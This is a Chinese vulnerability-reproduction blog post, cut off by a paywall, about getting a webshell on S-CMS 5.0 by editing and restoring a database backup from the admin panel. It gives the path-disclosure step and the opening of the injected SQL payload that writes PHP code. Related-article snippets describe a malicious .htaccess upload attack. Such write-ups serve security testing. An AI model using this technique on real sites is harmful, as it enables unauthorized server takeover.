【漏洞复现】闪灵CMS_5.0后台数据库备份Getshell

最新推荐文章于 2024-12-11 13:02:11 发布

FLy_鹏程万里

最新推荐文章于 2024-12-11 13:02:11 发布

阅读量226

点赞数

CC 4.0 BY-SA版权

分类专栏：【漏洞复现】文章标签：数据库渗透测试护网漏洞 Nday 0day

本文链接：https://blog.youkuaiyun.com/Fly_hps/article/details/139830950

【漏洞复现】专栏收录该内容

12 篇文章 ¥9.90 ¥99.00

订阅专栏

影响范围

闪灵CMS <=5.0

漏洞类型

数据库文件备份导致GetShell

利用条件

登陆后台管理账号+安装数据备份插件

漏洞概述

经测试，发现闪灵CMS后台运行备份当前数据库文件且备份名称中包含当前网站的web物理路径，同时允许上传本地备份的数据库文件，攻击者在登陆后台账号的情况下可以先备份当前数据库文件到本地，之后在数据库备份文件中插件恶意代码，之后再通过数据库恢复来getshell~

漏洞复现

首先，备份数据库文件到本地：

从数据库备份文件名中直接可以获取网站的物理路径信息：

之后在备份数据库文件中插入SQL语句：

DROP TABLE IF EXISTS `SL_shell`;
CREATE TABLE IF NOT EXISTS `SL_shell` (`cmd` longtext NOT NULL);
insert INTO SL_shell VALUES('<?ph

了解本专栏

订阅专栏解锁全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

【漏洞复现】闪灵CMS_5.0后台htaccess攻击Getshell

Fly_鹏程万里

06-20

220

闪灵CMS 5.0后台网站安全->安全设置界面规定了允许上传的文件格式，且不允许管理员添加php、asp、cgi等格式，但是却忽略了.htaccess，攻击者可以添加htaccess文件格式，并构造一个恶意.htaccess文件使其将当前目录下的所有文件解析为php，然后上传一个图片木马文件到服务器，从而获取服务器的管理权限~

【漏洞挖掘】——171、数据备份恢复GetShell

Fly_鹏程万里

10-16

126

攻击者可利用数据库备份恢复功能将数据库备份文件下载下来，随后将下载下来的文件利用slq语句写入shell再进行恢复，从而写入一句话木马，获取系统权限。

参与评论您还未登录，请先登录后发表或查看评论

【春秋云境】CVE-2023-51048 闪灵S-CMS v5.0 后台SQL注入漏洞

HMX404的博客

04-17

1096

S-CMS v5.0 被发现存在SQLI。

mysql 备份getshell_数据库备份getshell

weixin_34712106的博客

02-03

750

0x00 前言很久之前通过数据库备份拿到的一个webshell，本来准备等他们修复了之后再写的，但是提交了漏洞和修复方案他们接收之后很长时间没有修复，忽视了漏洞。所以今天写出来了。0x01 多次尝试首先这个站是偶然google hacking时找到的后台弱密码，进入后台之后发现是IIS6.0的服务器：这个后台可以对前端的文章、新闻等进行修改，发现可以上传图片到文章中，是一个上传点。先编辑一个一句话...

闪灵CMS企业建站系统(含小程序) v5.0 build20200211

08-19

闪灵CMS企业建站系统是淄博闪灵网络科技有限公司开发的一款专门为企业建站提供解决方案的产品，前端模板样式主打HTML5模板，以动画效果好、页面流畅、响应式布局为特色，程序主

闪灵CMS政府建站三合一系统开源免费版 v5.0 build20191106

09-29

闪灵CMS政府建站系统是淄博闪灵网络科技有限公司开发的一款专门为企业建站提供解决方案的产品，前端模板样式主打HTML5模板，以动画效果好、页面流畅、响应式布局为特色，程序主

闪灵CMS企业建站系统 5.0

10-26

闪灵CMS企业建站系统是淄博闪灵网络科技有限公司开发的一款专门为企业建站提供解决方案的产品，前端模板样式主打HTML5模板，以动画效果好、页面流畅、响应式布局为特色，程序主体采用PHP+MYSQL构架，拥有独立自主...

闪灵CMS政府建站系统含小程序 v5.0 build 20201014

11-03

为您提供闪灵CMS政府建站系统含小程序下载，闪灵CMS政府建站系统是淄博闪灵网络科技有限公司开发的一款专门为企业建站提供解决方案的产品，前端模板样式主打HTML5模板，以动画效果好、页面流畅、响应式布局为特色，...

闪灵CMS企业建站系统(含小程序) v5.0 build20191014

10-22

闪灵CMS企业建站系统是淄博闪灵网络科技有限公司开发的一款专门为企业建站提供解决方案的产品，前端模板样式主打HTML5模板，以动画效果好、页面流畅、响应式布局为特色，程序主体采用PHP+MYSQL构架，拥有独立自主开发的一整套函数、标签系统，具有极强的可扩展性，设计师可以非常简单的开发出漂亮实用的模板。系统自2015年发布第一个版本以来，至今已积累上万用户群，为上万企业提供最优质的建站方案。功能特点：支持电脑端+手机端+微信端（三端合一）支持站内搜索支持会员系统支持商城系统支持万能表单支持支付宝（即时到帐接口）/微信（扫码支付）付款方式支持中/英双语支持QQ/旺旺客服支持动/静态页面访问支持接

闪灵CMS电子商城系统(含微信小程序) v5.0 bulid20191015

10-21

闪灵CMS电子商城系统(双语带手机版)以php+mysql进行开发，网站安装简单、快捷。程序特色：一、使搜索引擎更加容易抓取和索引二、提供更多的功能，提高用户的友好体验三、可用性的提高，提高用户的友好体验使用方法：将文件上传至PHP空间或服务器，运行http://你的域名/install.php进行安装。只需两步即可安装完成，为了保证网站安全，请修改默认后台路径及数据库名称。闪灵CMS电子商城系统系统(含微信小程序)v3.0 bulid20190911更新说明：1.修复：修复了在开启静态后手机版网站部分链接错误的问题2.优化：百度统计代码可以选择开启或关闭，以减少网络符负荷3.修复：修复因为未过滤$_SERVER["PHP_SELF"]导致的两个SQL注入漏洞闪灵CMS电子商城系统系统(含微信小程序)v3.0 bulid20190917更新说明：1.优化：对开启httponly模式下无法读取cookie的主机作了兼容2.优化：https模式下对第三方分享代码做了兼容3.优化：联系页面百度地图的调用增加了对https协议的支持闪灵CMS电子商城系统系统(含微信小程序)v3.0 bulid

【S-CMS企业建站系统 v5.0 】闪灵CMS+含小程序+响应式布局+支持手机版网站+支持QQ旺旺客服

10-14

闪灵CMS企业建站系统功能特点支持手机版网站支持站内搜索支持会员系统支持商城系统支持万能表单支持支付宝（即时到帐接口）/微信（扫码支付）付款方式支持中/英双语支持QQ/旺旺客服支持动/静态页面访问支持接入微信公众号支持会员系统QQ/微信接口一键登录支持在线检测木马支持后台一键切换模板支持空间用量即时显示支持在线数据库备份/还原（不限时间点个数）支持多管理员（可各自设置权限）支持根目录/子目录安装支持后台一键更新程序（永久免费更新）支持自检更新，保证每天用到的都是最新源码前台模板全部基于精美模板开发后台路径：域名/admin/index.php# 用户名与密码：admin（安装时可设置）

闪灵CMS新闻门户系统(含小程序)

04-06

闪灵CMS电子商城系统源码v5.0（自带微信小程序）

专注于与编程相关的知识内容分享

06-13

460

闪灵CMS电子商城系统源码，双语带手机版，PHP+MYSQL进行开发，网站安装简单、快捷。闪灵CMS系统更新日志1.修复：修复了开启强制https后，说明文档重定向过多的问题2.修复：修复了商品名称过长时无法进行微信支付的问题3.修复：修复了会员中心万能表单附件显示路径错误的问题。

闪灵CMS学校建站系统模板含小程序

SEO资源下载

04-17

509

介绍：闪灵CMS学校建站系统（含小程序） v3.0 build20180905 更新说明 1.修复：修复后台自定义设置在插入带引号的文本自动转码的问题 2.修复：修复了手机模板产品及新闻分页链接只显示第一页的问题 3.新增：新增了一键同步文章到自媒体平台，支持百家号、企鹅号、微信公众号闪灵CMS学校建站系统是前端模板样式主打HTML5模板，以动画效果好、页面流畅、响应式布局为特色，程序主体采用PHP+MYSQL构架，拥有独立自主开发的一整套函数、标签系统，具有极强的可扩展性，设计师可以非常简单的开发出漂

构建高效医疗服务平台：闪灵CMS医院建站系统 v5.0 实战指南